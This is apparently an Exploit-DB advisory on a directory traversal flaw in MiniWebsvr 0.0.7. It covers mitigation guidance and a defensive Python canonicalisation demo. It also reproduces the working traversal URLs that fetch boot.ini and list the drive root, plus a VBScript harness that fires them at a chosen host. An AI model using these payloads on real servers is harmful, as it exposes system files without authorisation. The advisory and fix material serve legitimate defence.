Vendor: MiniWebsvr
By: shinnai
CVSS: 7.5 (HIGH)
Vulnerability type: Directory traversal
CWE: 22
Product Name: MiniWebsvr
Affected Version From: 0.0.7
Affected Version To: 0.0.7
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:
Year: 2007

MiniWebsvr 0.0.7 Directory traversal vulnerability

MiniWebsvr 0.0.7 does not confine request paths to its document root. A request path built from URL-encoded backslashes (%5C) and '..' segments is decoded and, on Windows, resolved with the backslashes acting as directory separators, so the server walks up out of the web root and serves whatever the path lands on. The advisory gives two request URLs: 'http://localhost/%5C..%5C..%5C..%5C..%5C..%5C../boot.ini' retrieves boot.ini from the root of the drive the server is installed on, and 'http://localhost/%5C..%5C..%5C..%5C..%5C..%5C../' returns a listing of that directory. No authentication is required; the accompanying exploit page defaults to port 8080, so substitute the port MiniWebsvr is actually listening on.

Mitigation:

No vendor patch is listed. Server-side, the fix is canonicalisation before authorisation: percent-decode the request path exactly once, treat both '/' and '\' as separators on Windows, collapse '.' and '..' segments, resolve the result to an absolute path and serve the file only if that path lies inside the document root; reject the request otherwise rather than trying to strip '../' patterns out of it. Disable directory listings unless they are needed, and run the server under an account that cannot read system files such as boot.ini, so that a traversal that does slip through exposes as little as possible. Because MiniWebsvr 0.0.7 is unpatched, do not expose it beyond a trusted network.
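The following Python is added here as an illustration; it is not part of the advisory and not MiniWebsvr's code. It shows why a check that only looks at '/'-delimited segments lets the advisory's %5C payload through, and how a canonicalising check of the kind described above rejects it. The document root, the `weak_segment_check` filter and the benign sample paths are assumptions for the demonstration; the advisory does not describe MiniWebsvr's own request handling.

```python
import posixpath
from typing import Optional
from urllib.parse import unquote

# Constructed document root for the demonstration (not MiniWebsvr's own).
DOCROOT = "/srv/www/htdocs"

# The two request paths from the advisory, as the server would receive them.
PAYLOAD_FILE = "/%5C..%5C..%5C..%5C..%5C..%5C../boot.ini"
PAYLOAD_DIR = "/%5C..%5C..%5C..%5C..%5C..%5C../"


def weak_segment_check(raw_path: str) -> bool:
    """Return True if no '/'-delimited segment of the decoded path is '..'.

    Assumption for illustration only: the advisory does not say what check
    MiniWebsvr 0.0.7 performs. A check of this shape passes the advisory's
    payload because every '..' sits inside one '/'-segment, separated by
    backslashes that Windows later honours as directory separators.
    """
    return all(seg != ".." for seg in unquote(raw_path).split("/"))


def safe_resolve(docroot: str, raw_path: str) -> Optional[str]:
    """Map a request path onto the filesystem, or return None if it escapes docroot.

    Order matters: decode once, unify separators, normalise, then check.
    Checking before decoding or before unifying is what the payload exploits.
    """
    decoded = unquote(raw_path)              # exactly one round of %XX decoding
    unified = decoded.replace("\\", "/")     # Windows treats '\' as '/'; so do we
    rel = unified.lstrip("/")                # always relative to the document root
    norm = posixpath.normpath(rel) if rel else "."   # collapse '.' and 'x/..'
    if norm == ".":
        return docroot
    if posixpath.isabs(norm) or norm == ".." or norm.startswith("../"):
        return None                          # climbed above the root
    full = posixpath.join(docroot, norm)
    # Prefix check as a second line of defence; on a real Windows host finish
    # with os.path.realpath() on both sides to cover drive letters and symlinks.
    if not full.startswith(docroot.rstrip("/") + "/"):
        return None
    return full


def demo() -> dict:
    """Run both checks over the advisory payloads and a few constructed paths."""
    cases = [PAYLOAD_FILE, PAYLOAD_DIR, "/../boot.ini", "/index.html",
             "/css/../index.html", "/"]
    return {p: (weak_segment_check(p), safe_resolve(DOCROOT, p)) for p in cases}


if __name__ == "__main__":
    for path, (weak_ok, resolved) in demo().items():
        print(f"{path!r:48} weak={'pass' if weak_ok else 'reject'} "
              f"hardened={resolved if resolved else 'reject'}")
```

Running it shows the weak check passing both advisory payloads while rejecting the plain '/../boot.ini', whereas the hardened resolver rejects all three and still serves ordinary paths, including ones that use '..' legitimately inside the root.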

Exploit-DB raw data:

<pre>
<code>-------------------------------------------------------------
<b>MiniWebsvr 0.0.7 Directory traversal vulnerability</b>
url: http://miniwebsvr.sourceforge.net/
author: shinnai
mail: shinnai[at]autistici[dot]org
site: http://shinnai.altervista.org

http://localhost/%5C..%5C..%5C..%5C..%5C..%5C../boot.ini or
http://localhost/%5C..%5C..%5C..%5C..%5C..%5C../
-------------------------------------------------------------

<!-- Point-and-click harness: save as .html and open in Internet Explorer
     (VBScript event handlers; other browsers ignore them). Enter the host
     and port MiniWebsvr listens on, then click a button. -->
Host			Port
<input type=text name=txtIP value = "localhost">	<input type=text name=txtPort value = "8080">

<input language=VBScript onclick=GetBoot() type=button value="Click to get boot.ini">

<input language=VBScript onclick=BrowseMe() type=button value="Click to browse">

<script language='vbscript'>
' Navigate the browser to the traversal URL: six encoded "\.." steps climb
' from the web root to the drive root, then fetch boot.ini.
Sub GetBoot
  on error resume next
  document.location = "http://" + txtIP.value + ":" + txtPort.value + "/%5C..%5C..%5C..%5C..%5C..%5C../boot.ini"
end sub

' Same traversal without a filename: requests a listing of the drive root.
Sub BrowseMe
  on error resume next
  document.location = "http://" + txtIP.value + ":" + txtPort.value + "/%5C..%5C..%5C..%5C..%5C..%5C../"
end sub
</script>
</code></pre>

# milw0rm.com [2007-04-11]